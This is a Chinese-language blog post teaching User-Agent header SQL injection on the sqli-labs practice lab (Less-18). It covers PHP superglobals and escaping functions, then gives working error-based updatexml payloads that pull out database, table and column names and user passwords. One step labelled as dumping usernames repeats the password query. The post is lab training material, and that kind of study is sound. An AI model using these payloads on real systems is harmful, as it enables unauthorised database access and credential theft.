<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.8.0">

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">

    <!--Description-->
    
        <meta name="description" content="在讲head注入之前，我们先来了解一些PHP的一些超全局变量，在php中有很多预定义的超全局变量，这就意味着他们在一个脚本的任何作用域都可用：
$_REQUEST:（获取get，post，cookie的传参，但在新版本中已无法获取cookie传参了）
$_POST:（获取post传参）
$_GET:">
    

    <!--Author-->
    
        <meta name="author" content="JYP">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="head头注入">
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="ALL BLUE">

    <!--Page Cover-->
    
        <meta property="og:image" content>
    

    <!-- Title -->
    
    <title>head头注入 - ALL BLUE</title>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/reset.css">
    <link rel="stylesheet" href="/css/main.css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdn.rawgit.com/noelboss/featherlight/1.3.5/release/featherlight.min.css" type="text/css" rel="stylesheet">

    <!-- Google Analytics -->
    


    <!--Favicon-->
    

</head>

<body>

<!-- Menu -->
<!-- Navigation -->
<header>
    <div class="logo">
        <a href="/">ALL BLUE</a>
    </div><!-- end logo -->

    <div id="menu_icon"></div>
    <nav>
        <ul>
            
            <li>
                <a href="/">Home</a>
            </li>
            
            <li>
                <a href="/archives">Archives</a>
            </li>
            
        </ul>
    </nav><!-- end navigation menu -->

    <div class="footer clearfix">
        <ul class="social clearfix">
            
            
                <li><a href="https://www.facebook.com/" class="fb" target="_blank" data-title="Facebook"></a></li>
            
            
                <li><a href="https://www.behance.net/" class="behance" target="_blank" data-title="Behance"></a></li>
            
            
                <li><a href="https://plus.google.com/+Pixelhint/posts" class="google" target="_blank" data-title="Google+"></a></li>
            
            
                <li><a href="https://dribbble.com/pixelhint" class="dribble" target="_blank" data-title="Dribble"></a></li>
            
            
            
            
        </ul><!-- end social -->

        <div class="rights">
            <p>Copyright © 2014 magnetic.</p>
            <p>Template by <a href="http://pixelhint.com/magnetic-free-html5-responsive-photography-website-template/">Pixelhint.com</a></p>
            <p>Hexo Theme by <a href="http://www.codeblocq.com/">Jonathan K.</a></p>
        </div><!-- end rights -->
    </div><!-- end footer -->
</header><!-- end header -->


<!-- Main Content -->
<section class="main clearfix">

    <section class="top" style="background: url('http://placehold.it/1300x500');">
        <div class="wrapper content_header clearfix">
            

<div class="work_nav">

    <ul class="btn clearfix">
        
        <li><a href="/2019/12/07/sql注入--0day审计案例(1)/" class="previous" data-title="sql注入--0day审计案例(1)"></a></li>
        
        <li><a href="/" class="grid" data-title="Portfolio"></a></li>
        
        <li><a href="/2019/12/07/sqlkzj/" class="next" data-title="宽字节注入"></a></li>
        
    </ul>

</div><!-- end work_nav -->
            <h1 class="title">head头注入</h1>
        </div>
    </section><!-- end top -->

    <section class="wrapper">
        <div class="content">

            <!-- Gallery -->
            

            <!-- Content -->
            <p><strong>在讲head注入之前，我们先来了解一些PHP的一些超全局变量，在php中有很多预定义的超全局变量，这就意味着他们在一个脚本的任何作用域都可用：</strong></p>
<p><strong>$_REQUEST:</strong>（获取get，post，cookie的传参，但在新版本中已无法获取cookie传参了）</p>
<p><strong>$_POST:</strong>（获取post传参）</p>
<p><strong>$_GET:</strong>(获取get的传参)</p>
<p><strong>$_COOKIE:</strong>(获取cookie的传参)</p>
<p><strong>$_SERVER</strong>(包含了诸如头信息(header),路径(path)等用户信息)</p>
<h3 id="转义函数"><a href="#转义函数" class="headerlink" title="转义函数"></a>转义函数</h3><p><strong>addslashes()</strong> 函数返回在预定义字符之前添加反斜杠的字符串。</p>
<p>预定义字符是：</p>
<ul>
<li>单引号（’）</li>
<li>双引号（”）</li>
<li>反斜杠（\）</li>
<li>NULL</li>
</ul>
<p>提示：该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。</p>
<p>注释：默认地，PHP 对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。所以您<br>不应对已转义过的字符串使用 addslashes()，因为这样会导致双层转义。</p>
<p>遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。</p>
<p>语法：addslashes(string)</p>
<p>string 必需。规定要转义的字符串。</p>
<p>返回值： 返回已转义的字符串。</p>
<p>PHP 版本： 4+</p>
<ul>
<li>stripslashes()</li>
</ul>
<p>函数删除由 addslashes() 函数添加的反斜杠。</p>
<p> <strong>mysql_real_escape_string()</strong></p>
<p>函数转义 SQL 语句中使用的字符串中的特殊字符。<br>下列字符受影响：</p>
<ul>
<li><p>\x00</p>
</li>
<li><p>\n</p>
</li>
<li><p>\r</p>
</li>
<li><p>\</p>
</li>
<li><p>‘</p>
</li>
<li><p>“</p>
</li>
<li><p>\x1a</p>
</li>
</ul>
<p>如果成功，则该函数返回被转义的字符串。如果失败，则返回 false。</p>
<p>语法：mysql_real_escape_string(string,connection)</p>
<p>string 必需。规定要转义的字符串。</p>
<p>connection 可选。规定 MySQL 连接。</p>
<p>如果未规定，则使用上一个连接。</p>
<p>说明：本函数将 string 中的特殊字符转义，并考虑到连接的当前字符集，因此可以安全用<br>于 mysql_query()。</p>
<h2 id="在这里我们用sqli-靶场less-18为例，"><a href="#在这里我们用sqli-靶场less-18为例，" class="headerlink" title="在这里我们用sqli-靶场less-18为例，"></a>在这里我们用sqli-靶场less-18为例，</h2><p>在此关源代码中我们看到代码中用check_input函数，对uname和passwd进行转义，所以不能在对username和password框进行注入了<br><img src="http://m.qpic.cn/psb?/V10ZDHQP2itaxQ/nwswSpT55o1rDq4PQUE4HrdNkta0ob3ZmTFzPVC*JSg!/b/dL8AAAAAAAAA&amp;bo=6QFKAAAAAAADF5A!&amp;rf=viewer_4" alt></p>
<p><img src="http://m.qpic.cn/psb?/V10ZDHQP2itaxQ/i*8eUgB0PmYpObHDUHxSCd*Tm5FLKf2TZEARLVerTFE!/b/dLkAAAAAAAAA&amp;bo=QQJVAAAAAAADFyQ!&amp;rf=viewer_4" alt><br>在往下代码我们看到了插入语句<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$insert=&quot;INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES (&apos;$uagent&apos;,</span><br><span class="line">&apos;$IP&apos;, $uname)&quot;;</span><br></pre></td></tr></table></figure></p>
<p>这穿代码将user-agent和ip插入了数据库，而我们的控制点也是这两个，那我们是不是能利用user-agent和ip进行插入，我们可以通过抓包修改他的user-agent进而来进行注入</p>
<h4 id="我们先来说一下updatexml-函数"><a href="#我们先来说一下updatexml-函数" class="headerlink" title="我们先来说一下updatexml() 函数"></a>我们先来说一下<strong>updatexml() 函数</strong></h4><p><strong>语法：updatexml(目标xml文档，xml路径，更新的内容)</strong></p>
<p>updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)实际上这里是去更新了XML文档，但是我们在XML文档路径的位置里面写入了子查询，我们输入特殊字符，然后就因为不符合输入规则然后报错了但是报错的时候他其实已经执行了那个子查询语句！</p>
<p>(0x7e其实代表着16进制的”~”号，转换成16进制其实是为了过一些过滤，使得代码”兼容性”更高，<strong>其实~是为了让语法报错，让我们插入的子查询执行并通过报错带出来</strong>，其实只要能让语法错误的标点符号其实都是可以的)</p>
<p>也可以使用extractvalue（）函数，但低版本的mysql好像不支持这个函数；</p>
<h3 id="我们通过modheard这个插件来对user-agent进行修改"><a href="#我们通过modheard这个插件来对user-agent进行修改" class="headerlink" title="我们通过modheard这个插件来对user-agent进行修改"></a>我们通过modheard这个插件来对user-agent进行修改</h3><hr>
<p>我们先修改user-agent进行测试</p>
<p><img src="http://m.qpic.cn/psb?/V10ZDHQP0EtwOl/q6bMPnwd5Da7o6uJLlJ1.yBautUyB39Idb5j8P42WaU!/b/dL8AAAAAAAAA&amp;bo=*QPdAAAAAAADBwE!&amp;rf=viewer_4" alt></p>
<p>发现插入成功！</p>
<p>那么我们就来开始构造payload进行注入：</p>
<ul>
<li>先查询数据库名：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; and updatexml(1,concat(0x7e,(select database())),1),&apos;&apos;,&apos;&apos;)#</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>1’闭合前面，后面的两对闭合单引号是为了补充’$IP’, $uname两个数据位置；在将数据库后面语句注释掉</p>
<p><img src="http://m.qpic.cn/psb?/V10ZDHQP0EtwOl/h5wItQlyqSf8q*fWEBZbyuxarCM9MsOS.gkgBK0AFo0!/b/dL4AAAAAAAAA&amp;bo=igSPAAAAAAADFzM!&amp;rf=viewer_4" alt></p>
<ul>
<li>查询表名</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&apos;security&apos;)),1),&apos;&apos;,&apos;&apos;)#</span><br></pre></td></tr></table></figure>
<p><img src="http://m.qpic.cn/psb?/V10ZDHQP0EtwOl/6dP8GqUgFPrBrmBaR2CUU0UPLq4cOpZe1BXSsvGGRjs!/b/dFQBAAAAAAAA&amp;bo=PwZoAAAAAAADF2M!&amp;rf=viewer_4" alt></p>
<ul>
<li>查询字段名<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&quot;users&quot;)),1),&apos;&apos;,&apos;&apos;)#</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p><img src="http://m.qpic.cn/psb?/V10ZDHQP0EtwOl/1*jz.Je1g7Y*Ky6011XcNEhXaffD0Mr6HN4hV9JpoLg!/b/dFYBAAAAAAAA&amp;bo=VwZ1AAAAAAADFxY!&amp;rf=viewer_4" alt></p>
<ul>
<li>爆用户名<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;and  updatexml(1,concat(0x7e,(select group_concat(password) from users)),1),&apos;&apos;,&apos;&apos;)#</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p><img src="http://m.qpic.cn/psb?/V10ZDHQP0EtwOl/.UxMQ7MiXCRxXQl1xnmZtDYwcUwVV8wZTNeYe0QlnII!/b/dL8AAAAAAAAA&amp;bo=8wTCAAAAAAADFwc!&amp;rf=viewer_4" alt></p>
<p>爆密码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;and  updatexml(1,concat(0x7e,(select group_concat(password) from users)),1),&apos;&apos;,&apos;&apos;)#</span><br></pre></td></tr></table></figure></p>
<p> <img src="http://m.qpic.cn/psb?/V10ZDHQP0EtwOl/pAockMgFEAkgsrRs7qt12dZT3QgONi0fXpuStLt3Ils!/b/dDcBAAAAAAAA&amp;bo=hQTRAAAAAAADF2I!&amp;rf=viewer_4" alt></p>
<p>这样一次head头的注入就这样完成了，而后面靶场的head注入其实也是对其他head头（referer、cookie）进行注入而已，而注入的方法多种多样……</p>


            <!-- Tags -->
            


<div class="tags">
    
</div>



            <!-- Comments -->
            <div>
                




            </div>
        </div><!-- end content -->
    </section>
</section><!-- end main -->

<!-- After footer scripts -->

<!-- jQuery -->
<script src="/js/jquery.js"></script>

<!-- Custom Code -->
<script src="/js/main.js"></script>

<!-- Gallery -->
<script src="//cdn.rawgit.com/noelboss/featherlight/1.3.5/release/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Disqus Comments -->


<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>